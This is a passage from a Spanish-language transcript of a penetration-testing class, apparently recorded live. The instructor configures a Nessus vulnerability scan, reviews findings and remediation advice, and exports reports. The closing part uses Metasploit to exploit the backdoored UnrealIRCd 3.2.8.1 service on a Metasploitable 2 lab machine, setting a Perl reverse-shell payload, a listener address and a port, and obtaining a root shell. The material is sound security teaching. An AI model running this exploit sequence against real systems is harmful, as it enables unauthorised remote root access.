que me gustaría remarcar y que me gustaría, bueno, que le pongan especial atención. Los safe checks. ¿Qué es esto de los safe checks? Bueno, los safe checks básicamente son como... ¿Cómo le podríamos decir? Pues como esa checklist que se tiene que seguir de seguridad para ejecutar un escaneo y que Nessus lo hace todo por detrás. Son, digamos, algunos puntos que lo que hacen es evitar que, por ejemplo, con un análisis de vulnerabilidad con esta herramienta, pues vayamos a derribar el host, que lo vayamos a dejar casi inoperante, porque se puede dar. Si el host no es muy bueno y no están habilitados los safe checks y estamos utilizando un escaneo muy general, podemos dejar totalmente inoperante incluso una infraestructura en producción. Entonces, por eso tengan muchísimo cuidado aquí. Siempre enable safe checks. Siempre. Fuera de aquí realmente no hay absolutamente nada más que hacer, más que guardar el escaneo y continuar. Vamos a hacerle un save y vamos a ponerle máquina escaneo avanzado. Ah, y se me olvidaba, casi se me olvidaba. Los plugins, señores. Esto es lo más importante y lo más interesante de Nessus. Aquí está todo su poder. Por eso es que esta no es una herramienta como Nmap, como Nikto o como cualquier otra. Nessus tiene por sí sola una base de datos muy amplia de plugins para detectar vulnerabilidades o fallos de seguridad en muchos servicios existentes, como lo son, por ejemplo, AIX, Alibaba Cloud, Alma Linux, Amazon Linux, scripts de inteligencia artificial. Incluso, si les interesa saber más de esto, pues aquí está toda esta información. Vulnerabilidades sobre Gemini, por ejemplo. LangChain, Microsoft RDIN Detection, NuGet, OpenAI ChatGPT app install en MacOS. Fíjense, es capaz de detectar todo esto. Es capaz de habilitar con sus plugins los ataques de fuerza bruta. Aquí lo más importante también es personalizar el escaneo al nivel de desactivar los plugins que no nos sirvan. Hay muchísimos plugins. Exactamente, Sebastián. Esto lo que hace es hacernos el escaneo mucho más pesado, mucho más tardado y realmente no nos aporta más nada. E incluso puede confundirse, puede llegar a confundirse el propio escaneo entre tanta información, entre tantos plugins. Por esto es muy óptimo que personalicemos los scripts, perdón, los plugins que nosotros habilitamos aquí en Nessus, específicamente en el escaneo avanzado. Backdoors no sirven. Brute Force no sirve. CentOS no nos sirve. Abusos de CGI no sirve. Esto no sirve. Cisco no nos sirve. Bases de datos no sirve. Debian Local Security Checks. Esto podría ser que sí, si nosotros sabemos que, por ejemplo, la máquina está arquitecturada en Debian. Unix, puede ser que sí. Denial of Service, puede ser que sí también. F5
no nos interesa. Fedora no nos interesa. FreeBSD no nos interesa. Gentoo tampoco. Huawei, MacOS, Mandriva, Mariner, NetWare, New Start, Oracle Linux, Oracle VM, Palo Alto, Photon, Red Hat, Rocky Linux, Scientific Linux, Slackware, Solaris. Incluso podríamos desactivar, por ejemplo, SMTP, SNMP. SCADA para infraestructura crítica, esto no sirve. Sin embargo, podríamos decir, bueno, pues esto en absoluto se trata de infraestructura crítica. Desactivado. Tenable OT. Este debe ser algún servicio de Tenable, pero este no los conozco, ¿eh? Vamos a dejarlos. Tencent, Ubuntu. Nosotros podríamos decir, bueno, con toda la recopilación de información que hicimos, ya sabemos qué sistema operativo es, ya sabemos qué servicios y qué versiones tiene. Señores, aquí está todo. Unity Linux, Virtuoso, VMware, Windows, todos estos de Windows, para afuera. Hacemos un save y ya estaría más que listo para que nosotros lo ejecutemos. Ahora bien, vamos a dirigirnos al escaneo básico. Si se fijan, hay muchas vulnerabilidades críticas. Es más, recordarán ustedes, ¿tiene plugins para Fortinet? ¿Correcto, Osvaldo? ¿Sí tiene? Recordarán que en el EPSS, en CVE Details lo muestra en porcentaje. ¿Lo recuerdan? Pues aquí, como yo se los había explicado en las diapositivas, está en decimal 0.86. Quiere decir probabilidad de explotación de esta vulnerabilidad 86.25%. Únicamente se recorre y listo. Ahora, podríamos ver que aquí hay una versión la cual permite incluso ejecutar código arbitrario con una backdoor de algún servicio. Y fíjense, y cómo muchas veces esto lo pasamos por alto, ¿eh? Muchas veces me preguntan, bueno, profe, ¿y entonces cómo mitigamos? Pues aquí está. ¿Cómo que cómo? Aquí está. Aquí te dicen la solución expresa. Te dicen, esto es lo que tienes que hacer para solucionar esta vulnerabilidad. Vuelve a descargar el software. Verifica que esté utilizando el MD5 o el SHA-1 publicados. Que esto era algo que yo ya les había enseñado también a revisar. Y reinstálalo. Ahí está la mitigación. Por supuesto, se escucha en muchas ocasiones más fácil de lo que realmente es. Muchas veces una instalación requiere toda la modificación del archivo de configuración para hacerlo compatible con la infraestructura actual, por ejemplo. Entonces, pues bueno, eso ya es cosa del Blue Team. Aquí nos aparecen también las remediaciones detectadas por el propio Nessus de varias de las vulnerabilidades que detectó. Por ejemplo, para remediar 3 vulnerabilidades, nos dice que podemos utilizar esto, que podemos hacer un upgrade a un servicio bind 9.11.22. O que para Samba podemos subir la versión a 4.2.11, 4.3.8, 4.4.2 o después, o cualquier otra que haya salido después. Y fíjense,
Y lo más importante también aquí, arriba a la derecha, que dice Report. Aquí lo que vamos a hacer, y pueden ustedes seleccionar el formato que ustedes quieran, HTML, CSV o PDF. Si su plan es ya entregarlo, el reporte, PDF. Si su plan es estar visualizándolo constantemente, yo les recomendaría HTML. Si su plan es exportar el reporte para después procesarlo con alguna herramienta, con algún otro software, CSV. E incluso fíjense cómo Nessus sí trae la opción de CBSS 4.0. Entonces nosotros perfectamente la podemos incluir. Ahora bien, aquí nos dice, a ver, ¿qué plantilla de reporte quieres que utilicemos? La lista completa de vulnerabilidades por host, el detalle de vulnerabilidades por host, el detalle de vulnerabilidades por plugin, o por ejemplo, una lista que, bueno, indique las vulnerabilidades de cada host en el escaneo. En este caso, como solo estamos especificando un host, un objetivo, pues a nosotros el que nos conviene es el más normal. Este Complete List of Vulnerabilities by Host. Generate Report. Aquí está. Descargado. Y perfectamente presentado. Con incluso la vulnerabilidad, la criticidad, la calificación de CBS B3, la probabilidad de explotación y el nombre del plugin con el cual se detectó por parte de Nessus. Bien. Y la otra opción, y que también es muy usual, HTML. Y aquí lo que vamos a hacer simplemente es Firefox. ¿Y cómo se llama el archivo? A ver. Es un HTML. Es este. Sí, sí es ese. No, es este, ¿verdad? Máquina. Firefox. Máquina 1. UE. Enter. Aquí está nuestro escaneo en HTML. Toda la información detectada. Ahora bien, ¿qué procede? Se estarán preguntando, ¿no? Vamos a cerrar Wireshark. Vamos a cerrar el reporte. Ya saben, documentación que existe sobre esta vulnerabilidad. Bien, aquí nos dice, ¿sabes qué? Sí, efectivamente,
Hay un servicio Unreal IRCD 3.2.8.1 que está backdoorizado. Aquí nos indican, bueno, junto con este otro, un poco de la descripción de la vulnerabilidad y cómo descubrieron incluso dicha vulnerabilidad, quién y un montón de cosas más. Que bueno, nos pueden llegar a interesar. Como también son, por ejemplo, estos hashes. Sobre todo a la hora de descargar ciertos exploits o ciertos archivos. Pues muy fácil. ¿Qué procede, profe? Pues voy a hacerlo muy rápido, ¿eh? Sin embargo, en la siguiente clase vamos a hablar específicamente, única y exclusivamente de explotación y de Metasploit, que es lo más importante. Pero hemos terminado nuestro análisis de vulnerabilidades. ¿Qué vamos a hacer? Bueno, me dijeron, vamos a buscar, no sé, a ver, Unreal puede ser que no esté como IRC, sino Unreal. Efectivamente. Pues, ¿qué creen? Aquí está el módulo necesario para explotarlo. Use 5 para ahorrarnos tiempo. Rango excelente. Verificado no, pero rango excelente. Fecha de publicación 2010. Y vamos a ver si nos da resultado, ¿eh? O incluso no sé, creo que no se necesita ni siquiera ese host, pero a ver. Sí se necesita entonces. Show options, set. ¿Qué payload estamos utilizando? Ah, es que no hemos ejecutado un payload. Perdón, no hemos seleccionado un payload. Con razón, yo decía, ¿qué está pasando? Es cierto. Cuando nos diga eso, inmediatamente vamos a poner un show payloads. En este caso no hay ningún meterpreter, creo que no. Vamos a tratar hacerlo vía Perl. Vamos a hacerlo con Perl. Use 8. Set payload 8. Set lhost 192.168.58.135 y creo que ya sería todo. This address is already in use. Ok, entonces set lport 555 ufw allow 555 sudo ufw allow 555 Kali run. Listo. Efectivamente, shell abierta. Y mucho ojito. Aquí está todo el contenido de la máquina Metasploitable 2 que tenemos allá del otro lado. Y bueno, podemos incluso
hacer un PWD. Estamos en la carpeta Etsy Unreal. Y podemos hacer un... no sé, incluso podemos meternos a la propia carpeta. Podemos hacer lo que queramos realmente. CD. Aquí en donde estamos, CD vulnerable. CD Samba Wiki. ¿Qué ruta es esta? MSF Home Admin. Podríamos hacer, a ver. Aquí estamos incluso como admin. Sí, ok, vamos a seguir así, a ver. Y por ejemplo, es más, aquí hay un directorio que dice pwd. Podemos meternos a pwd. Y aquí nos aparece un poquito más de información. Podemos hacer un cd Etsy. Y podríamos, no sé, también movernos modules. Podríamos también colocar un who am I. Y si se fijan, estamos incluso como root. Esto también es muy importante y nos puede servir mucho porque ya vamos a tener incluso el acceso directo como administradores. Esta es una manera únicamente de ejecutar esta explotación y de aprovechar una de las vulnerabilidades. Realmente, aquí lo más importante, sobre todo, es el exploit. Si hay un buen exploit comprobado y si la vulnerabilidad está comprobada dentro del sistema, sin parche, sí o sí vamos a tener acceso. Sí o sí. Así que bien, damas y caballeros, con esto terminamos por el día de hoy. Espero que les haya gustado mucho la clase y que les haya parecido bien esta demostración tan sencilla y breve. Realmente lo que buscaba era que entiendan el análisis de vulnerabilidades por ahora. En la siguiente clase vamos a entender un poco más de esto de los exploits, de Metasploit, de las explotaciones, de los distintos tipos, métodos, de los payloads y de muchas otras cosas más que les van a servir para la explotación. Nos acercamos ya al final, damas y caballeros. Metasploit es muy amplio y aunque, bueno, voy a tratar de cubrir lo más importante, les recomiendo encarecidamente también familiarizarse con esta herramienta porque es muy útil y se utiliza. Después que pase un tiempo, tal vez unos años, que ya adquieran más experiencia, seguramente ya ni siquiera van a utilizar Metasploit. Van a utilizar sus propios exploits, sus propios scripts para correr sus exploits, sus propios payloads. Entonces, bueno, por el momento Metasploit va a ser un buen aliado. Así que, damas y caballeros, esta es la explotación. Voy a estarles mandando, e incluso quiero mandárselos de una